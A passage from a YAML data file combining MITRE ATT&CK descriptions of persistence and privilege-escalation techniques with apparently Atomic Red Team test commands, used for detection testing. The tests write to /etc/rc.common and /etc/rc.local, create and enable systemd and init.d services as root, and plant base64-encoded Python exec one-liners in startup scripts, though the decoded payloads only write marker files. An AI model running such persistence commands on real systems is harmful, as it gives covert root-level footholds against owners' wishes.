url: https://cpb-us-e1.wpmucdn.com/sites.psu.edu/dist/4/24696/files/2019/07/psumac2019-345-Installer-Package-Scripting-Making-your-deployments-easier-one-at-a-time.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:59:13.167Z'
name: Installer Packages
description: |-
Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
Using legitimate applications, adversaries have distributed applications with modified installer scripts to execute malicious content. When a user installs the application, they may be required to grant administrative permissions to allow the installation. At the end of the installation process of the legitimate application, content such as macOS `postinstall` scripts can be executed with the inherited elevated permissions. Adversaries can use these scripts to execute a malicious executable or install other malicious components (such as a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)) with the elevated permissions.(Citation: Application Bundle Manipulation Brandon Dalton)(Citation: wardle evilquest parti)(Citation: Windows AppleJeus GReAT)(Citation: Debian Manual Maintainer Scripts)
Depending on the distribution, Linux versions of package installer scripts are sometimes called maintainer scripts or post installation scripts. These scripts can include `preinst`, `postinst`, `prerm`, `postrm` scripts and run as root when executed.
For Windows, the Microsoft Installer services uses `.msi` files to manage the installing, updating, and uninstalling of applications. These installation routines may also include instructions to perform additional actions that may be abused by adversaries.(Citation: Microsoft Installation Procedures)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Brandon Dalton @PartyD0lphin
- Rodchenko Aleksandr
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- Windows
- macOS
x_mitre_version: '1.2'
atomic_tests: []
T1037.004:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--dca670cf-eeec-438f-8185-fd959d9ef211
created: '2020-01-15T16:25:22.260Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1037/004
external_id: T1037.004
- source_name: Apple Developer Doco Archive Launchd
description: Apple. (2016, September 13). Daemons and Services Programming
Guide - Creating Launch Daemons and Agents. Retrieved February 24, 2021.
url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html
- source_name: Startup Items
description: Apple. (2016, September 13). Startup Items. Retrieved July 11,
2017.
url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html
- source_name: Juniper Networks ESXi Backdoor 2022
description: Asher Langton. (2022, December 9). A Custom Python Backdoor for
VMWare ESXi Servers. Retrieved March 26, 2025.
url: https://blogs.juniper.net/en-us/threat-research/a-custom-python-backdoor-for-vmware-esxi-servers
- source_name: Ubuntu Manpage systemd rc
description: Canonical Ltd.. (n.d.). systemd-rc-local-generator - Compatibility
generator for starting /etc/rc.local and /usr/sbin/halt.local during
boot and shutdown. Retrieved February 23, 2021.
url: http://manpages.ubuntu.com/manpages/bionic/man8/systemd-rc-local-generator.8.html
- source_name: IranThreats Kittens Dec 2017
description: Iran Threats . (2017, December 5). Flying Kitten to Rocket Kitten,
A Case of Ambiguity and Shared Code. Retrieved May 28, 2020.
url: https://iranthreats.github.io/resources/attribution-flying-rocket-kitten/
- source_name: Methods of Mac Malware Persistence
description: Patrick Wardle. (2014, September). Methods of Malware Persistence
on Mac OS X. Retrieved July 5, 2017.
url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
- source_name: intezer-kaiji-malware
description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
turning to Golang. Retrieved December 17, 2020.'
url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
- source_name: Intezer HiddenWasp Map 2019
description: Sanmillan, I. (2019, May 29). HiddenWasp Malware Stings Targeted
Linux Systems. Retrieved June 24, 2019.
url: https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:28.955Z'
name: 'Boot or Logon Initialization Scripts: Rc.common'
description: |-
Adversaries may establish persistence by modifying RC scripts, which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.
Adversaries may establish persistence by adding a malicious binary path or shell commands to rc.local, rc.common, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence.
Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as ESXi hypervisors, IoT, or embedded systems.(Citation: intezer-kaiji-malware) As ESXi servers store most system files in memory and therefore discard changes on shutdown, leveraging `/etc/rc.local.d/local.sh` is one of the few mechanisms for enabling persistence across reboots.(Citation: Juniper Networks ESXi Backdoor 2022)
Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of Launchd.(Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.3.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- macOS
- Linux
- Network Devices
- ESXi
x_mitre_version: '2.2'
identifier: T1037.004
atomic_tests:
- name: rc.common
auto_generated_guid: 97a48daa-8bca-4bc0-b1a9-c1d163e762de
description: |
Modify rc.common
[Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html)
supported_platforms:
- macos
executor:
command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello
World"'' >> /etc/rc.common
'
elevation_required: true
name: bash
- name: rc.common
auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a
description: 'Modify rc.common
'
supported_platforms:
- linux
executor:
name: bash
elevation_required: true
command: |
filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi
printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common
echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common
printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common
sudo chmod +x /etc/rc.common
cleanup_command: 'origfilename=''/etc/rc.common.original'';if [ ! -f $origfilename
];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common
&& sudo rm $origfilename;fi
'
- name: rc.local
auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102
description: 'Modify rc.local
'
supported_platforms:
- linux
executor:
name: sh
elevation_required: true
command: |
filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi
[ "$(uname)" = 'FreeBSD' ] && alias python3=python3.9 && printf '#\!/usr/local/bin/bash' | sudo tee /etc/rc.local || printf '#!/bin/bash' | sudo tee /etc/rc.local
echo "\npython3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local
printf 'exit 0' | sudo tee -a /etc/rc.local
sudo chmod +x /etc/rc.local
cleanup_command: 'origfilename=''/etc/rc.local.original'';if [ ! -f $origfilename
];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local &&
sudo rm $origfilename;fi
'
T1134:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--dcaa092b-7de9-4a21-977f-7fcb77e89c48
created: '2017-12-14T16:46:06.044Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1134
external_id: T1134
- source_name: BlackHat Atkinson Winchester Token Manipulation
description: 'Atkinson, J., Winchester, R. (2017, December 7). A Process is
No One: Hunting for Token Manipulation. Retrieved December 21, 2017.'
url: https://www.blackhat.com/docs/eu-17/materials/eu-17-Atkinson-A-Process-Is-No-One-Hunting-For-Token-Manipulation.pdf
- source_name: Microsoft Command-line Logging
description: Mathers, B. (2017, March 7). Command line process auditing. Retrieved
April 21, 2017.
url: https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing
- source_name: Microsoft LogonUser
description: Microsoft TechNet. (n.d.). Retrieved April 25, 2017.
url: https://msdn.microsoft.com/en-us/library/windows/desktop/aa378184(v=vs.85).aspx
- source_name: Microsoft DuplicateTokenEx
description: Microsoft TechNet. (n.d.). Retrieved April 25, 2017.
url: https://msdn.microsoft.com/en-us/library/windows/desktop/aa446617(v=vs.85).aspx
- source_name: Microsoft ImpersonateLoggedOnUser
description: Microsoft TechNet. (n.d.). Retrieved April 25, 2017.
url: https://msdn.microsoft.com/en-us/library/windows/desktop/aa378612(v=vs.85).aspx
- source_name: Pentestlab Token Manipulation
description: netbiosX. (2017, April 3). Token Manipulation. Retrieved April
21, 2017.
url: https://pentestlab.blog/2017/04/03/token-manipulation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:29.051Z'
name: Access Token Manipulation
description: |-
Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These token can then be applied to an existing process (i.e. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001)) or used to spawn a new process (i.e. [Create Process with Token](https://attack.mitre.org/techniques/T1134/002)). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.(Citation: Pentestlab Token Manipulation)
Any standard user can use the runas command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Tom Ueltschi @c_APT_ure
- Travis Smith, Tripwire
- Robby Winchester, @robwinchester3
- Jared Atkinson, @jaredcatkinson
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
atomic_tests: []
T1543.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--dfefe2ed-4389-4318-8762-f0272b350a1b
created: '2020-01-17T16:15:19.870Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1543/002
external_id: T1543.002
- source_name: airwalk backdoor unix systems
description: airwalk. (2023, January 1). A guide to backdooring Unix systems.
Retrieved May 31, 2023.
url: http://www.ouah.org/backdoors.html
- source_name: Anomali Rocke March 2019
description: Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With
a New Malware Family Written in Golang. Retrieved April 24, 2019.
url: https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang
- source_name: freedesktop systemd.service
description: Free Desktop. (n.d.). systemd.service — Service unit configuration.
Retrieved March 20, 2023.
url: https://www.freedesktop.org/software/systemd/man/systemd.service.html
- source_name: 'Linux man-pages: systemd January 2014'
description: Linux man-pages. (2014, January). systemd(1) - Linux manual page.
Retrieved April 23, 2019.
url: http://man7.org/linux/man-pages/man1/systemd.1.html
- source_name: Pepe Berba Systemd 2022
description: 'Pepe Berba. (2022, February 7). Hunting for Persistence in Linux
(Part 5): Systemd Generators. Retrieved April 8, 2025.'
url: https://pberba.github.io/security/2022/02/07/linux-threat-hunting-for-persistence-systemd-generators/
- source_name: Berba hunting linux systemd
description: 'Pepe Berba. (2022, January 30). Hunting for Persistence in Linux
(Part 3): Systemd, Timers, and Cron. Retrieved March 20, 2023.'
url: https://pberba.github.io/security/2022/01/30/linux-threat-hunting-for-persistence-systemd-timers-cron/
- source_name: Rapid7 Service Persistence 22JUNE2016
description: Rapid7. (2016, June 22). Service Persistence. Retrieved April
23, 2019.
url: https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence
- source_name: Elastic Security Labs Linux Persistence 2024
description: Ruben Groenewoud. (2024, August 20). Linux Detection Engineering
- A primer on persistence mechanisms. Retrieved March 18, 2025.
url: https://www.elastic.co/security-labs/primer-on-persistence-mechanisms
- source_name: lambert systemd 2022
description: 'Tony Lambert. (2022, November 13). ATT&CK T1501: Understanding
systemd service persistence. Retrieved March 20, 2023.'
url: https://redcanary.com/blog/attck-t1501-understanding-systemd-service-persistence/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:29.942Z'
name: 'Create or Modify System Process: SysV/Systemd Service'
description: "Adversaries may create or modify systemd services to repeatedly
execute malicious payloads as part of persistence. Systemd is a system and
service manager commonly used for managing background daemon processes (also
known as services) and other system resources.(Citation: Linux man-pages:
systemd January 2014) Systemd is the default initialization (init) system
on many Linux distributions replacing legacy init systems, including SysVinit
and Upstart, while remaining backwards compatible. \n\nSystemd utilizes unit
configuration files with the `.service` file extension to encode information
about a service's process. By default, system level unit files are stored
in the `/systemd/system` directory of the root owned directories (`/`). User
level unit files are stored in the `/systemd/user` directories of the user
owned directories (`$HOME`).(Citation: lambert systemd 2022) \n\nInside the
`.service` unit files, the following directives are used to execute commands:(Citation:
freedesktop systemd.service) \n\n* `ExecStart`, `ExecStartPre`, and `ExecStartPost`
directives execute when a service is started manually by `systemctl` or on
system start if the service is set to automatically start.\n* `ExecReload`
directive executes when a service restarts. \n* `ExecStop`, `ExecStopPre`,
and `ExecStopPost` directives execute when a service is stopped. \n\nAdversaries
have created new service files, altered the commands a `.service` file’s directive
executes, and modified the user directive a `.service` file executes as, which
could result in privilege escalation. Adversaries may also place symbolic
links in these directories, enabling systemd to find these payloads regardless
of where they reside on the filesystem.(Citation: Anomali Rocke March 2019)(Citation:
airwalk backdoor unix systems)(Citation: Rapid7 Service Persistence 22JUNE2016)
\n\nThe `.service` file’s User directive can be used to run service as a specific
user, which could result in privilege escalation based on specific user/group
permissions. \n\nSystemd services can be created via systemd generators, which
support the dynamic generation of unit files. Systemd generators are small
executables that run during boot or configuration reloads to dynamically create
or modify systemd unit files by converting non-native configurations into
services, symlinks, or drop-ins (i.e., [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037)).(Citation:
Elastic Security Labs Linux Persistence 2024)(Citation: Pepe Berba Systemd
2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Tony Lambert, Red Canary
- Emad Al-Mousa, Saudi Aramco
- Tim (Wadhwa-)Brown
- Ruben Groenewoud (@RFGroenewoud)
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
x_mitre_version: '1.6'
identifier: T1543.002
atomic_tests:
- name: Create Systemd Service
auto_generated_guid: d9e4f24f-aa67-4c6e-bcbf-85622b697a7c
description: 'This test creates a Systemd service unit file and enables it as
a service.
'
supported_platforms:
- linux
input_arguments:
systemd_service_path:
description: Path to systemd service unit file
type: path
default: "/etc/systemd/system"
systemd_service_file:
description: File name of systemd service unit file
type: string
default: art-systemd-service.service
execstoppost_action:
description: ExecStopPost action for Systemd service
type: string
default: "/bin/touch /tmp/art-systemd-execstoppost-marker"
execreload_action:
description: ExecReload action for Systemd service
type: string
default: "/bin/touch /tmp/art-systemd-execreload-marker"
execstart_action:
description: ExecStart action for Systemd service
type: string
default: "/bin/touch /tmp/art-systemd-execstart-marker"
execstop_action:
description: ExecStop action for Systemd service
type: string
default: "/bin/touch /tmp/art-systemd-execstop-marker"
execstartpre_action:
description: ExecStartPre action for Systemd service
type: string
default: "/bin/touch /tmp/art-systemd-execstartpre-marker"
execstartpost_action:
description: ExecStartPost action for Systemd service
type: string
default: "/bin/touch /tmp/art-systemd-execstartpost-marker"
executor:
command: |
echo "[Unit]" > #{systemd_service_path}/#{systemd_service_file}
echo "Description=Atomic Red Team Systemd Service" >> #{systemd_service_path}/#{systemd_service_file}
echo "" >> #{systemd_service_path}/#{systemd_service_file}
echo "[Service]" >> #{systemd_service_path}/#{systemd_service_file}
echo "Type=simple"
echo "ExecStart=#{execstart_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "ExecStartPre=#{execstartpre_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "ExecStartPost=#{execstartpost_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "ExecReload=#{execreload_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "ExecStop=#{execstop_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "ExecStopPost=#{execstoppost_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "" >> #{systemd_service_path}/#{systemd_service_file}
echo "[Install]" >> #{systemd_service_path}/#{systemd_service_file}
echo "WantedBy=default.target" >> #{systemd_service_path}/#{systemd_service_file}
systemctl daemon-reload
systemctl enable #{systemd_service_file}
systemctl start #{systemd_service_file}
cleanup_command: |
systemctl stop #{systemd_service_file}
systemctl disable #{systemd_service_file}
rm -rf #{systemd_service_path}/#{systemd_service_file}
systemctl daemon-reload
name: bash
elevation_required: true
- name: Create SysV Service
auto_generated_guid: 760fe8d2-79d9-494f-905e-a239a3df86f6
description: 'This test creates a SysV service unit file and enables it as a
service.
'
supported_platforms:
- linux
input_arguments:
rc_service_path:
description: Path to rc service file
type: path
default: "/usr/local/etc/rc.d"
rc_service_file:
description: File name of rc service file
type: string
default: art-test
executor:
command: "echo '#\\!/bin/sh' > #{rc_service_path}/#{rc_service_file}\necho
' ' >> #{rc_service_path}/#{rc_service_file}\necho '#' >> #{rc_service_path}/#{rc_service_file}\necho
'# PROVIDE: art-test' >> #{rc_service_path}/#{rc_service_file}\necho '#
REQUIRE: LOGIN' >> #{rc_service_path}/#{rc_service_file}\necho '# KEYWORD:
shutdown' >> #{rc_service_path}/#{rc_service_file}\necho ' ' >> #{rc_service_path}/#{rc_service_file}\necho
'. /etc/rc.subr' >> #{rc_service_path}/#{rc_service_file}\necho ' ' >> #{rc_service_path}/#{rc_service_file}\necho
'name=\"art_test\"' >> #{rc_service_path}/#{rc_service_file}\necho 'rcvar=art_test_enable'
>> #{rc_service_path}/#{rc_service_file}\necho 'load_rc_config ${name}'
>> #{rc_service_path}/#{rc_service_file}\necho 'command=\"/usr/bin/touch\"'
>> #{rc_service_path}/#{rc_service_file}\necho 'start_cmd=\"art_test_start\"'
>> #{rc_service_path}/#{rc_service_file}\necho '' >> #{rc_service_path}/#{rc_service_file}\necho
'art_test_start()' >> #{rc_service_path}/#{rc_service_file} \necho '{'
>> #{rc_service_path}/#{rc_service_file}\necho ' ${command} /tmp/art-test.marker'
>> #{rc_service_path}/#{rc_service_file}\necho '}' >> #{rc_service_path}/#{rc_service_file}\necho
' ' >> #{rc_service_path}/#{rc_service_file} \necho 'run_rc_command
\"$1\"' >> #{rc_service_path}/#{rc_service_file}\nchmod +x #{rc_service_path}/#{rc_service_file}\nservice
art-test enable\nservice art-test start\n"
cleanup_command: |
sysrc -x art_test_enable
rm -f #{rc_service_path}/#{rc_service_file}
name: sh
elevation_required: true
- name: Create Systemd Service file, Enable the service , Modify and Reload the
service.
auto_generated_guid: c35ac4a8-19de-43af-b9f8-755da7e89c89
description: "This test creates a systemd service unit file and enables it to
autostart on boot. Once service is created and enabled, it also modifies this
same service file showcasing both Creation and Modification of system process.
\n"
supported_platforms:
- linux
dependencies:
- description: 'System must be Ubuntu ,Kali OR CentOS.
'
prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat
/etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i
''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi;
'
get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS.
'
executor:
name: bash
elevation_required: true
command: |
echo "#!/bin/bash" > /etc/init.d/T1543.002
echo "### BEGIN INIT INFO" >> /etc/init.d/T1543.002
echo "# Provides : Atomic Test T1543.002" >> /etc/init.d/T1543.002
echo "# Required-Start: \$all" >> /etc/init.d/T1543.002
echo "# Required-Stop : " >> /etc/init.d/T1543.002
echo "# Default-Start: 2 3 4 5" >> /etc/init.d/T1543.002
echo "# Default-Stop: " >> /etc/init.d/T1543.002
echo "# Short Description: Atomic Test for Systemd Service Creation" >> /etc/init.d/T1543.002
echo "### END INIT INFO" >> /etc/init.d/T1543.002
echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK')) \" " >> /etc/init.d/T1543.002
chmod +x /etc/init.d/T1543.002
if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then chkconfig T1543.002 on ; else echo "Please run this test on Ubnutu , kali OR centos" ; fi
systemctl enable T1543.002
systemctl start T1543.002
echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\"" | sudo tee -a /etc/init.d/T1543.002
systemctl daemon-reload
systemctl restart T1543.002
cleanup_command: |
systemctl stop T1543.002
systemctl disable T1543.002
rm -rf /etc/init.d/T1543.002
systemctl daemon-reload
T1547.013:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--e0232cb0-ded5-4c2e-9dc7-2893142a5c11
created: '2019-09-10T18:13:12.195Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1547/013
external_id: T1547.013
- source_name: Free Desktop Application Autostart Feb 2006
description: Free Desktop. (2006, February 13). Desktop Application Autostart
Specification. Retrieved September 12, 2019.
url: https://specifications.freedesktop.org/autostart-spec/autostart-spec-latest.html
- source_name: Free Desktop Entry Keys
description: Free Desktop. (2017, December 24). Recognized Desktop Entry Keys.
Retrieved November 17, 2024.
url: https://specifications.freedesktop.org/desktop-entry-spec/latest/recognized-keys.html
- source_name: Red Canary Netwire Linux 2022
description: TONY LAMBERT. (2022, June 7). Trapping the Netwire RAT on Linux.
Retrieved September 28, 2023.
url: https://redcanary.com/blog/netwire-remote-access-trojan-on-linux/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:30.252Z'
name: XDG Autostart Entries
description: |-
Adversaries may add or modify XDG Autostart Entries to execute malicious programs or commands when a user’s desktop environment is loaded at login. XDG Autostart entries are available for any XDG-compliant Linux system. XDG Autostart entries use Desktop Entry files (`.desktop`) to configure the user’s desktop environment upon user login. These configuration files determine what applications launch upon user login, define associated applications to open specific file types, and define applications used to open removable media.(Citation: Free Desktop Application Autostart Feb 2006)(Citation: Free Desktop Entry Keys)
Adversaries may abuse this feature to establish persistence by adding a path to a malicious binary or command to the `Exec` directive in the `.desktop` configuration file. When the user’s desktop environment is loaded at user login, the `.desktop` files located in the XDG Autostart directories are automatically executed. System-wide Autostart entries are located in the `/etc/xdg/autostart` directory while the user entries are located in the `~/.config/autostart` directory.
Adversaries may combine this technique with [Masquerading](https://attack.mitre.org/techniques/T1036) to blend malicious Autostart entries with legitimate programs.(Citation: Red Canary Netwire Linux 2022)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Tony Lambert, Red Canary
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
x_mitre_version: '1.2'
atomic_tests: []
T1055.005:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--e49ee9d2-0d98-44ef-85e5-5d3100065744
created: '2020-01-14T01:30:41.092Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1055/005
external_id: T1055.005
- source_name: Elastic Process Injection July 2017
description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: FireEye TLS Nov 2017
description: Vaish, A. & Nemes, S. (2017, November 28). Newly Observed Ursnif
Variant Employs Malicious TLS Callback Technique to Achieve Process Injection.
Retrieved December 18, 2017.
url: https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:32.111Z'
name: Thread Local Storage
description: "Adversaries may inject malicious code into processes via thread
local storage (TLS) callbacks in order to evade process-based defenses as
well as possibly elevate privileges. TLS callback injection is a method of
executing arbitrary code in the address space of a separate live process.
\n\nTLS callback injection involves manipulating pointers inside a portable
executable (PE) to redirect a process to malicious code before reaching the
code's legitimate entry point. TLS callbacks are normally used by the OS to
setup and/or cleanup data used by threads. Manipulating TLS callbacks may
be performed by allocating and writing to specific offsets within a process’
memory space using other [Process Injection](https://attack.mitre.org/techniques/T1055)
techniques such as [Process Hollowing](https://attack.mitre.org/techniques/T1055/012).(Citation:
FireEye TLS Nov 2017)\n\nRunning code in the context of another process may
allow access to the process's memory, system/network resources, and possibly
elevated privileges. Execution via TLS callback injection may also evade detection
from security products since the execution is masked under a legitimate process. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
atomic_tests: []
T1547.007:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--e5cc9e7a-e61a-46a1-b869-55fb6eab058e
created: '2020-01-24T18:15:06.641Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1547/007
external_id: T1547.007
- source_name: Re-Open windows on Mac
description: Apple. (2016, December 6). Automatically re-open windows, apps,
and documents on your Mac. Retrieved July 11, 2017.
url: https://support.apple.com/en-us/HT204005
- source_name: Methods of Mac Malware Persistence
description: Patrick Wardle. (2014, September). Methods of Malware Persistence
on Mac OS X. Retrieved July 5, 2017.
url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
- source_name: Wardle Persistence Chapter
description: 'Patrick Wardle. (n.d.). Chapter 0x2: Persistence. Retrieved
April 13, 2022.'
